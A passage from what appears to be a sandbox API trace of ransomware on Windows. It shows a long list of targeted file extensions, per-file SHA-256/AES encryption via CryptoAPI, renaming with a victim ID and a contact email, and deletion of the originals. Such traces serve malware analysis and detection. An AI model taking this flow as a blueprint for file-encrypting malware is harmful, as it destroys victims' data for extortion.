qlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.509] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.509] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.509] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.510] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x99e0, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x99e0, lpOverlapped=0x0) returned 1
	[0183.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.521] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcac48) returned 1
	[0183.522] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.523] CryptCreateHash (in: hProv=0xfcac48, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.523] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.523] CryptDeriveKey (in: hProv=0xfcac48, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb90f0) returned 1
	[0183.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.523] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x99e0, dwBufLen=0x99e0 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x99f0) returned 1
	[0183.525] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.525] RtlMoveMemory (in: Destination=0xfe6b68, Source=0xfdd180, Length=0x99e0 | out: Destination=0xfe6b68) 
	[0183.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.525] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe6b68*, pdwDataLen=0x18aefc*=0x99e0, dwBufLen=0x99f0 | out: pbData=0xfe6b68*, pdwDataLen=0x18aefc*=0x99f0) returned 1
	[0183.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.526] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0183.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.527] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0183.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.527] CryptReleaseContext (hProv=0xfcac48, dwFlags=0x0) returned 1
	[0183.527] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.527] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.528] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.531] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 102
	[0183.531] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.532] WriteFile (in: hFile=0x390, lpBuffer=0xfe6b68*, nNumberOfBytesToWrite=0x99f0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe6b68*, lpNumberOfBytesWritten=0x18b358*=0x99f0, lpOverlapped=0x0) returned 1
	[0183.536] CloseHandle (hObject=0x390) returned 1
	[0183.536] CloseHandle (hObject=0x388) returned 1
	[0183.537] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4")) returned 1
	[0183.543] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\-srnrgsbo-cmjxi.mp4")) returned 0
	[0183.543] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8019150, ftCreationTime.dwHighDateTime=0x1d975d3, ftLastAccessTime.dwLowDateTime=0x9556b580, ftLastAccessTime.dwHighDateTime=0x1d97696, ftLastWriteTime.dwLowDateTime=0x9556b580, ftLastWriteTime.dwHighDateTime=0x1d97696, nFileSizeHigh=0x0, nFileSizeLow=0x6fd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="9lC2m1bibxn3ueHCgc.swf", cAlternateFileName="9LC2M1~1.SWF")) returned 1
	[0183.543] lstrcmpW (lpString1="9lC2m1bibxn3ueHCgc.swf", lpString2="..") returned 1
	[0183.543] lstrcmpW (lpString1="9lC2m1bibxn3ueHCgc.swf", lpString2=".") returned 1
	[0183.543] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\"
	[0183.543] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\", lpString2="9lC2m1bibxn3ueHCgc.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\9lC2m1bibxn3ueHCgc.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\9lC2m1bibxn3ueHCgc.swf"
	[0183.544] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\9lC2m1bibxn3ueHCgc.swf") returned 63
	[0183.544] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.544] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\9lC2m1bibxn3ueHCgc.swf", cchLength=0x3f | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf") returned 0x3f
	[0183.544] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.544] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.544] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf"
	[0183.544] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf") returned 63
	[0183.545] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.545] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0183.545] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.546] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.546] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.546] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.546] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.549] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x6fd3, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x6fd3, lpOverlapped=0x0) returned 1
	[0183.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.552] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcae68) returned 1
	[0183.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.554] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.554] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.555] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9370) returned 1
	[0183.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.555] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x6fd3, dwBufLen=0x6fd3 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x6fe0) returned 1
	[0183.556] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.556] RtlMoveMemory (in: Destination=0xfe4160, Source=0xfdd180, Length=0x6fd3 | out: Destination=0xfe4160) 
	[0183.556] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.556] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4160*, pdwDataLen=0x18aefc*=0x6fd3, dwBufLen=0x6fe0 | out: pbData=0xfe4160*, pdwDataLen=0x18aefc*=0x6fe0) returned 1
	[0183.557] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.557] CryptDestroyKey (hKey=0xfb9370) returned 1
	[0183.557] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.557] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0183.557] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.558] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0183.558] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.558] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.559] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.559] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.561] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 105
	[0183.562] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.562] WriteFile (in: hFile=0x390, lpBuffer=0xfe4160*, nNumberOfBytesToWrite=0x6fe0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe4160*, lpNumberOfBytesWritten=0x18b358*=0x6fe0, lpOverlapped=0x0) returned 1
	[0183.566] CloseHandle (hObject=0x390) returned 1
	[0183.566] CloseHandle (hObject=0x388) returned 1
	[0183.566] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf")) returned 1
